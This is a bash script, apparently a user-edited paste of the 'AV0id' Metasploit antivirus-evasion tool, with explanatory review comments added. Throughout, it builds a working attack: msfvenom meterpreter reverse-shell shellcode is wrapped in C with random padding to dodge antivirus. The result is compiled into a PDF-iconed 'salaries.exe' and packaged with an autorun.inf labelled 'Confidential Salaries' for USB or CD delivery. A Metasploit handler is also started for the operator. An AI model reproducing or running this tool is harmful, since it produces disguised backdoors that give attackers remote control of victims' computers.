Sh3lLDu5T

AVoid-Edited-By-CybaFrE3z

Mar 4th, 2015
  1. #!/usr/bin/env bash
  2. #
  3. #  CybaFrE3z
  4. #    Tried to edit it to use msfvenom
  5. #
  6. # AV0id - Metasploit Payload Anti-Virus Evasion
  7. # Daniel Compton
  8. # www.commonexploits.com
  9. # info@commexploits.com
  10. # Twitter = @commonexploits
  11. # 05/2013
  12. # Tested on BackTrack 5 and Kali only.
  13.  
  14. #####################################################################################
  15. # Released as open source by NCC Group Plc - http://www.nccgroup.com/
  16.  
  17. # Developed by Daniel Compton, daniel dot compton at nccgroup dot com
  18.  
  19. # https://github.com/nccgroup/metasploitavevasion
  20.  
  21. #Released under AGPL see LICENSE for more information
  22.  
  23. ######################################################################################
  24.  
  25. # Credit to other A.V. scripts and research by Astr0baby, Vanish3r & Hasan aka inf0g33k
  26.  
  27. # User options
  28. OUTPUTNAME="salaries.exe" # The payload exe created name
  29. PAYLOAD="windows/meterpreter/reverse_tcp" # The payload to use
  30. MSFPAYLOAD=`which msfpayload` # Path to the msfpayload script
  31. MSFENCODE=`which msfencode` # Path to the msfencode script
  32. MSFCLI=`which msfcli` # Path to the msfcli script
  33. MSFVENOM=`which msfvenom` # Path to msfvenom
  34.  
  35. # Script begins
  36. #===============================================================================
  37.  
  38. VERSION="1.5"
  39.  
  40. # spinner for Metasploit Generator
# Cosmetic progress bar printed while the payload is generated. It does not
# track real progress: the counter advances by a random 2..6 per step and each
# step sleeps 20 ms, so the bar completes after roughly half a second.
# Leaves bar, barlength, i and n set as script-level variables (no locals),
# exactly like the original.
spinlong() {
    bar=" ++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
    barlength=${#bar}
    i=0
    until (( i >= 100 )); do
        # number of bar characters to reveal for the current percentage
        n=$(( i * barlength / 100 ))
        printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
        i=$(( i + RANDOM % 5 + 2 ))
        sleep 0.02
    done
}
  53.  
  54.  
  55. # spinner for random seed generator
# Second cosmetic progress bar, shown while the padding size is chosen. Same
# mechanics as spinlong (random 2..6 step, 20 ms sleep per step) with a binary
# looking fill pattern. Sets bar, barlength, i and n at script level.
spinlong2() {
    bar=" 011001110010010011101110011010101010101101010010101110"
    barlength=${#bar}
    i=0
    until (( i >= 100 )); do
        # number of bar characters to reveal for the current percentage
        n=$(( i * barlength / 100 ))
        printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
        i=$(( i + RANDOM % 5 + 2 ))
        sleep 0.02
    done
}
  68.  
# Main flow: banner, tool checks, icon fetch, interactive prompts (listener
# address/port, padding size), msfvenom shellcode generation, C wrapper build,
# MinGW cross-compile, autorun bundle, cleanup, optional handler launch.
# Everything below runs in the current working directory and leaves files
# there (see the cleanup and autorun sections).

# Splash banner, held for three seconds before the first prompt.
clear
echo ""
echo -e "\e[00;32m##################################################################\e[00m"
echo ""
echo -e "*** \e[01;31mAV\e[00m\e[01;32m0id\e[00m - Metasploit Shell A.V. Avoider Version $VERSION  ***"
echo ""
echo -e "\e[00;32m##################################################################\e[00m"
echo ""
sleep 3
clear

#Check for gcc compiler
# The MinGW cross-compiler is what turns build.c into a Windows executable
# further down, so the script stops here when it is not on PATH.
which i586-mingw32msvc-gcc >/dev/null 2>&1
if [ $? -eq 0 ]; then
    echo ""
else
    echo ""
    echo -e "\e[01;31m[!]\e[00m Unable to find the required gcc program, install i586-mingw32msvc-gcc and try again"
    echo ""
    exit 1
fi

#Check for Metasploit
# Passes if any one of the three legacy tools resolved in the options block
# is present. MSFVENOM, the tool actually invoked in the payload step, and
# MSFCLI, used for the handler, are not individually required by this test.
if [[ "$MSFPAYLOAD" != "" || "$MSFENCODE" != "" || "$MSFCLI" != "" ]]; then
    echo ""
else
    echo ""
    echo -e "\e[01;31m[!]\e[00m Unable to find the required Metasploit program, cant continue. Install and try again"
    echo -e "\e[01;31m[!]\e[00m If msfpayload, msfencode and msfcli are not in your PATH, edit this script options"
    echo ""
    exit 1
fi


# create a PDF icon
# icons/icon.res is linked into the executable (PDF-style icon) and
# icons/autorun.ico is copied into the autorun bundle. When either is
# missing both are fetched over plain HTTP from the author's site. Nothing
# checks what was downloaded (no TLS, no checksum), and icon.res becomes
# part of the compiled binary, so the operator is trusting that host and
# the network path for the content of the output file.

#Check for PDF icon files

ls icons/icon.res >/dev/null 2>&1 && ls icons/autorun.ico >/dev/null 2>&1
if [ $? -eq 0 ]; then
    echo ""
else
    echo ""
    echo -e "\e[01;31m[!]\e[00m I can't find the icon files I will need, I will try and download these now"
    echo ""
    sleep 2
    echo ""
    echo -e "\e[01;32m[-]\e[00m Attempting to download 2 files...please wait"
    echo ""
    mkdir icons >/dev/null 2>&1
    # NOTE(review): if this cd fails the two downloads land in the current
    # directory and the unconditional `cd ..` below moves up one level too far.
    cd icons >/dev/null 2>&1
    wget http://www.commonexploits.com/tools/avoid/icon.res >/dev/null 2>&1
    wget http://www.commonexploits.com/tools/avoid/autorun.ico >/dev/null 2>&1
    sleep 2
    ls icon.res >/dev/null 2>&1 && ls autorun.ico >/dev/null 2>&1
    if [ $? -eq 0 ]; then
        echo -e "\e[01;32m[+]\e[00m Success, icon files downloaded"
        cd ..
        echo ""
    else
        echo -e "\e[01;31m[!]\e[00m Unable to download the icon files, script will continue but you will not have the masked PDF exe or autorun icon"
        cd ..
        echo ""
    fi
fi

# Random Msfencode encoding iterations
# Only referenced by the commented-out msfpayload/msfencode pipeline in the
# payload step; the msfvenom command that actually runs does not use ITER.
#ITER=`seq 5 10 |sort -R |sort -R | head -1`
ITER=`shuf -i 10-20 -n 1`

# Listener target. Option 1 takes the first interface whose ifconfig line
# contains "eth" and reads its address from the "inet addr:" (or "inet adr:")
# field, i.e. the pre-iproute2 ifconfig output format; option 2 asks for an
# address. Both then prompt for a port. IP and PORT are used verbatim later
# (msfvenom LHOST/LPORT and the handler) without validation.
echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
echo -e "\e[01;31m[?]\e[00m What system do you want the Metasploit listenter to run on? Enter 1 or 2 and press enter"
echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
echo ""
echo " 1. Use my current system and IP address"
echo ""
echo " 2. Use an alternative system, i.e public external address"
echo ""
echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
echo ""
echo -ne "\e[01;32m>\e[00m "
read INTEXT
echo ""
if [ "$INTEXT" = "1" ]; then
    echo ""
    IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
    IP=$(ifconfig "$IPINT" |egrep "inet add?r:" |cut -d ":" -f 2 |awk '{ print $1 }')
    echo -e "\e[01;32m[-]\e[00m Local system selected, listener will be launched on \e[01;32m$IP\e[00m using interface \e[01;32m$IPINT\e[00m"
    echo ""
    echo -e "\e[1;31m-------------------------------------------------------\e[00m"
    echo -e "\e[01;31m[?]\e[00m What port number do you want to listen on?"
    echo -e "\e[1;31m-------------------------------------------------------\e[00m"
    echo ""
    echo -ne "\e[01;32m>\e[00m "
    read PORT
    echo ""
elif [ "$INTEXT" = "2" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Alternative system selected"
    echo ""
    echo -e "\e[1;31m--------------------------------------------------------------------\e[00m"
    echo -e "\e[01;31m[?]\e[00m What IP address to you want the listener to run on?"
    echo -e "\e[1;31m--------------------------------------------------------------------\e[00m"
    echo ""
    echo -ne "\e[01;32m>\e[00m "
    read IP
    echo ""
    echo ""
    echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
    echo -e "\e[01;31m[?]\e[00m What port number do you want to listen on? If on the internet try port 53 if restricted"
    echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
    echo ""
    echo -ne "\e[01;32m>\e[00m "
    read PORT
    echo ""
else
    echo -e "\e[01;31m[!]\e[00m You didnt select a valid option, try again"
    echo ""
    exit 1
fi
echo ""
echo -e "\e[01;32m[-]\e[00m Generating Metasploit payload, please wait..."
echo ""
# spinlong is purely cosmetic; it runs before, not during, the msfvenom call.
spinlong
#Payload creater
# msfvenom writes the shellcode as a C array into msf.c (stderr discarded).
# The msfpayload|msfencode chain on the next line is the pre-msfvenom
# version, kept as a comment only; it is not executed.
$MSFVENOM -p $PAYLOAD LHOST=$IP LPORT=$PORT EXITFUNC=thread -b \x00 -f c > msf.c 2>/dev/null
#$MSFPAYLOAD "$PAYLOAD" LHOST="$IP" LPORT="$PORT" EXITFUNC=thread R | $MSFENCODE -e x86/shikata_ga_nai -c $ITER -t raw 2>/dev/null | $MSFENCODE -e x86/jmp_call_additive -c $ITER -t raw 2>/dev/null | $MSFENCODE -e x86/call4_dword_xor -c $ITER -t raw 2>/dev/null |  $MSFENCODE -e x86/shikata_ga_nai -c $ITER -t c > msf.c 2>/dev/null
echo ""
echo ""
# Menu
# The "stealth" level only chooses SEED, the number of random padding bytes
# embedded in the binary below; the shellcode is identical for every option.
# The detection ratios in the menu text are the author's figures from the
# original release and are not measured by this script.
echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
echo -e "\e[01;31m[?]\e[00m How stealthy do you want the file? Enter 1, 2, 3, 4 or 5 and press enter"
echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
echo ""
echo " 1. Normal - about 400K payoad  - fast compile - 13/46 A.V. products detected as malicious"
echo ""
echo " 2. Stealth - about 1-2 MB payload - fast compile - 12/46 A.V. products detected as malicious"
echo ""
echo " 3. Super Stealth - about 10-20MB payload - fast compile - 11/46 A.V. detected as malicious"
echo ""
echo " 4. Insane Stealth - about 50MB payload - slower compile - 10/46 A.V. detected as malicious"
echo ""
echo " 5. Desperate Stealth - about 100MB payload - slower compile - Not tested with A.V."
echo ""
echo -e "\e[1;31m----------------------------------------------------------------------------------------------\e[00m"
echo ""
echo -ne "\e[01;32m>\e[00m "
read LEVEL
echo ""
if [ "$LEVEL" = "1" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Normal selected, please wait a few seconds"
    echo ""
    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
    echo ""
    spinlong2
    SEED=$(shuf -i 100000-500000 -n 1)
elif [ "$LEVEL" = "2" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Stealth selected, please wait a few seconds"
    echo ""
    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
    echo ""
    spinlong2
    SEED=$(shuf -i 1000000-5000000 -n 1)
elif [ "$LEVEL" = "3" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Super Stealth selected, please wait a few seconds"
    echo ""
    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
    echo ""
    spinlong2
    SEED=$(shuf -i 8000000-12000000 -n 1)
elif [ "$LEVEL" = "4" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Insane Stealth selected, please wait a few minutes"
    echo ""
    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
    echo ""
    spinlong2
    SEED=$(shuf -i 40000000-60000000 -n 1)
elif [ "$LEVEL" = "5" ]; then
    echo ""
    echo -e "\e[01;32m[-]\e[00m Desperate Stealth selected, please wait a few minutes"
    echo ""
    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
    echo ""
    spinlong2
    SEED=$(shuf -i 100000000-200000000 -n 1)
else
    echo -e "\e[01;31m[!]\e[00m You didnt select a option, exiting"
    echo ""
    exit 1
fi

# build the c file ready for compile
# build.c is appended to (>>), never truncated, so a build.c left from an
# interrupted earlier run is prepended to this one. Its contents:
#   padding[]     SEED characters from the tr set `_A-Z-a-z-0-9`, taken from
#                 /dev/urandom and wrapped in double quotes by the two sed
#                 calls, so each build is a distinct file
#   payload[]     msf.c minus every line containing "unsigned" (assumes that
#                 word appears only on msfvenom's array declaration line)
#   comment[512]  an empty buffer
#   main()        casts payload to a function pointer and calls it
echo ""
echo '#include <stdio.h>' >> build.c
echo 'unsigned char padding[]=' >> build.c
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c$SEED > random
sed -i 's/$/"/' random
sed -i 's/^/"/' random
cat random >> build.c
echo  ';' >> build.c
echo 'char payload[] =' >> build.c
cat msf.c |grep -v "unsigned" >> build.c
echo 'char comment[512] = "";' >> build.c
echo 'int main(int argc, char **argv) {' >> build.c
echo  ' (*(void (*)()) payload)();' >> build.c
echo '  return(0);' >> build.c
echo '}' >> build.c

# gcc compile the exploit
# -mwindows selects the Windows GUI subsystem (no console window at run
# time); icons/icon.res is linked in only when it exists.

ls icons/icon.res >/dev/null 2>&1
if [ $? -eq 0 ]; then
    i586-mingw32msvc-gcc -Wall -mwindows icons/icon.res build.c -o "$OUTPUTNAME"
else
    i586-mingw32msvc-gcc -Wall -mwindows build.c -o "$OUTPUTNAME"
fi

# check if file built correctly
# NOTE(review): only the existence of OUTPUTNAME is tested, not the compiler's
# exit status, so an executable left over from an earlier run also passes.
LOCATED=`pwd`
ls "$OUTPUTNAME" >/dev/null 2>&1
if [ $? -eq 0 ]; then
    echo ""
    echo -e "\e[01;32m[+]\e[00m Your payload has been successfully created and is located here: \e[01;32m"$LOCATED"/"$OUTPUTNAME"\e[00m"
else
    echo ""
    echo -e "\e[01;31m[!]\e[00m Something went wrong trying to compile the executable, exiting"
    echo ""
    exit 1
fi

# create autorun files
# autorun/ receives a copy of the executable, the icon, and an autorun.inf
# that names the executable as the "open" target with the fixed label
# "Confidential Salaries". Together with the default OUTPUTNAME these are
# constant strings that identify output of this script.
mkdir autorun >/dev/null 2>&1
cp "$OUTPUTNAME" autorun/ >/dev/null 2>&1
cp icons/autorun.ico autorun/ >/dev/null 2>&1
echo "[autorun]" > autorun/autorun.inf
echo "open="$OUTPUTNAME"" >> autorun/autorun.inf
echo "icon=autorun.ico" >> autorun/autorun.inf
echo "label=Confidential Salaries" >> autorun/autorun.inf
echo ""
echo -e "\e[01;32m[+]\e[00m I have also created 3 AutoRun files here: \e[01;32m"$LOCATED"/"autorun/"\e[00m - simply copy these files to a CD or USB"

# clean up temp files
# build.c, random and msf.c exist in the working directory only between the
# build step and this point; the executable, icons/ and autorun/ remain.
rm build.c >/dev/null 2>&1
rm random >/dev/null 2>&1
rm msf.c >/dev/null 2>&1


# Handler launch. Any answer other than "1" is treated as "No" (there is no
# invalid-option branch here, unlike the earlier prompts). Option 1 runs
# MSFCLI, which the Metasploit check above does not guarantee was found.
echo ""
sleep 2
echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
echo -e "\e[01;31m[?]\e[00m Do you want the listener to be loaded automatically? Enter 1 or 2 and press enter"
echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
echo ""
echo " 1. Yes"
echo ""
echo " 2. No"
echo ""
echo -e "\e[1;31m----------------------------------------------------------------------------------------------\e[00m"
echo ""
echo -ne "\e[01;32m>\e[00m "
read INTEXT
echo ""
if [ "$INTEXT" = "1" ]; then
    echo -e "\e[01;32m[-]\e[00m Loading the Metasploit listener on \e[01;32m$IP:$PORT\e[00m, please wait..."
    echo ""
    $MSFCLI exploit/multi/handler PAYLOAD="$PAYLOAD" LHOST="$IP" LPORT="$PORT" E 2>/dev/null
else
    echo ""
    echo -e "\e[01;32m[-]\e[00m Run the following code on your listener system:"
    echo ""
    echo -e "\e[01;32m+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\e[00m"
    echo ""
    echo "$MSFCLI exploit/multi/handler PAYLOAD="$PAYLOAD" LHOST="$IP" LPORT="$PORT" E"
    echo ""
    echo -e "\e[01;32m+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\e[00m"
    echo ""
fi